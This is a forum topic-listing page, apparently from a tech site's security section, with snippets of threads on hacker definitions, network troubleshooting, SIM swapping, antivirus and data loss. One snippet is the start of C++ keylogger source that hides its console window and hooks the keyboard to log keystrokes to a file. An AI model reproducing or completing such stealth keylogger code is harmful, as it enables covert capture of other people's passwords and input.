1,117 Topics

Member Avatar for
Member Avatar for 44kerrnilly
Member Avatar for 77goldiesingh5
Member Avatar for happygeek

A survey of attendees at Infosecurity Europe earlier this month showed 70 percent in favour of the dictionary definition (in this case the Cambridge Dictionary) of a hacker being amended. The amendment in question being to remove 'illegality' from the definition. The current definition of a hacker is "a person …

Member Avatar for Naheedmir
1
4K
Member Avatar for AccurateAG

PART 1 1. INTRODUCTION: When you are starting with your first SEO project, you may feel as if you have been told to empty the ocean with a teaspoon, there is so much to know and so much to do. Well, don't freak out, it is not as bad as …

Member Avatar for Naheedmir
16
24K
Member Avatar for myerslarry21

Dell Inspiron is stuck in Network update configuration boot loop will not go into to set up or bios. Hard drive has been erased need to reinstall Windows 10 how do I get it to stop Network booting?

Member Avatar for Naheedmir
0
104
Member Avatar for elton_2

Hello, My company is using Windows Server 2012 and we got attacked. My users lost their permition to enter in some repositorys and they cant change their passwords in some PC's. What I should do? Create a entire new AD? Recovering AD? I rlly need help

Member Avatar for rproffitt
0
35
Member Avatar for kyronsaif

I wanted to ask something for my friend Tcll, how would you link a MAC address with no IP up to a network namespace? I know nothing about network namespaces or much about networking atall, he doesnt know mainly what commands to run or configure it. Thanks :).

Member Avatar for Tcll
0
688
Member Avatar for ymh07900

Please save the above xml contents of my Excel Office add-in manifest as manifest.xml. If you insert the add-in using the manifest file the add-in gets installed from the add-in files from my github repository. I want to embed this manifest.xml into Open office xml. So, when I send my …

Member Avatar for rproffitt
0
36
Member Avatar for manjeeta

Input devices are used for giving input to the computer. But output devices are used to get the result back from the computer. The examples of input devices are keyboard, mouse, scanner, digital camera atc...whereas output devices include monitor, printer, projector etc

Member Avatar for Reverend Jim
1
184
Member Avatar for samiouwll222
Member Avatar for golihoy278

#define _WIN32_WINNT 0x0500 #include<fstream> #include<windows.h> #include<winuser.h> using namespace std; void stealth(){ HWND stealth; AllocConsole(); stealth = FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); } ofstream out("keys.txt", ios::out); LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) { PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam); // If key is being pressed if (wParam == WM_KEYDOWN) { switch (p->vkCode) { …

0
63
Member Avatar for falotfalon
Member Avatar for Dani
0
57
Member Avatar for Chris Morris

I am Little confuse about the ciso Device and routers. Can anyone help to sovle my issue regarding cisco devices. Which deive or routers is best for internect connectivity without any internet connections. And also tell me about the extension or ports when my business is grow. then i want …

Member Avatar for rproffitt
0
19
Member Avatar for saif_15
Member Avatar for Dani
0
149
Member Avatar for Mr.M
Member Avatar for Innocent_8

I have a website and I want to change the index.php and it is not working each time I add htaccess file code it will stop me from loging in as admin.

Member Avatar for AndreRet
0
290
Member Avatar for tareqjhe1

Hello Friends, Recently I have created a website. And whenever I am visiting [my website](https://www.tblog.net/) one yellow i can see left side of address bar. It saying my connection not secure. "Part of this page are not secure(such as images)" . I don't know why it's showing like this.

Member Avatar for Dani
1
260
Member Avatar for happygeek

According to research from data recovery specialists Kroll Ontrack, some three quarters of those workers that had lost data on a broken device didn't attempt to ensure that information was irretrievable before disposing of the hardware. ![dwebdatarip](/attachments/large/0/dwebdatarip.jpg "dwebdatarip") It doesn't matter whether the hardware itself is a PC or laptop, …

Member Avatar for Backgroundsun
2
2K
Member Avatar for Neil_12

In the modern world, it’s easy to understand that data is absolutely essential to many corporations and organizations. There is an ever-growing need to understand the needs and desires of your customer base, so that you may tailor your products/services/platform as much as possible to meet these particular needs. However, …

Member Avatar for Mr.M
3
3K
Member Avatar for Lincoln=1cent
Member Avatar for Aaa_3

HI : I WANT THIS BOOK Oracle Privacy Security Auditing: Includes Federal Law Compliance with HIPAA

Member Avatar for rproffitt
0
130
Member Avatar for Lightninghawk
Member Avatar for holisticgroup19
0
2K
Member Avatar for v.gangani

I have list of unique names of players in column A in sheet 1. And in sheet 2 I have data of cricket score of different matches for that particular player with same unique names. And in sheet 3 I have data of same players for football matches. Now I …

0
99
Member Avatar for Mr.M

Hi DW. Well I'm very much interested in the data protection and also giving the best privacy to the public where we protect your passwords. I've seen something that Firefox had introduced to their browsers with also their Apps. This is called LockWise which is a tool to sync your …

0
1K
Member Avatar for rproffitt

For those very new to this area, please google SIM SWAP and discover a very nasty security issue with all phones we use today. At first glance the new security researcher might think I'm exaggerating. Do your own research and tell me you don't find this to be one of …

Member Avatar for Mr.M
0
3K
Member Avatar for charliebrooke

I'm using Windows Defender as full antivirus and Malwarebytes (Free version) So far. I've never had viruses malware on my computers. I started doing this 2016-2017. Are paid antivirus products not worth it now? Back then i used to use Bitdefender and it was pretty good. It had a pretty …

Member Avatar for gracelee
0
419
Member Avatar for Abrienne

There can various actions that take us to the cause of Data Loss, **Intentional Action** *Intentional deletion of a file or program* **Unintentional Action** *Accidental deletion of a file or program Misplacement of CDs or Memory sticks Administration errors Inability to read unknown file format* I really found this Wiki …

Member Avatar for JamesCherrill
0
415
Member Avatar for dave.wright

I looking to create a database form for people to create receipts to issue to customers but I need to be able to lock the record so that it can't be edited once it has been printed and saved. How can I do this?

Member Avatar for rproffitt
0
239
Member Avatar for Tcll

So I've successfully written a metaclass that gives python the functionality of private attributes in classes. Q: But what about `inst.__private`? A: >>> class A(object): __slots__ = ['__private'] def __new__(cls): inst = object.__new__(cls) inst.__private = 10 return inst def showprivate(inst): return inst.__private >>> inst = A() >>> inst.showprivate() 10 >>> …

Member Avatar for Tcll
0
2K
Member Avatar for MosaicFuneral

Haven't programmed in a long time. Last project was a GCODE pathway generator I wrote several years back. My compiler is obviously several years out of date. Uses time(), itoa(), rand(). Current standard compliant compilers should have <chrono>, <thread>, <random>, and to_string() in suppliment to those more deprecated functions. This …

Member Avatar for DGPickett
2
3K

The End.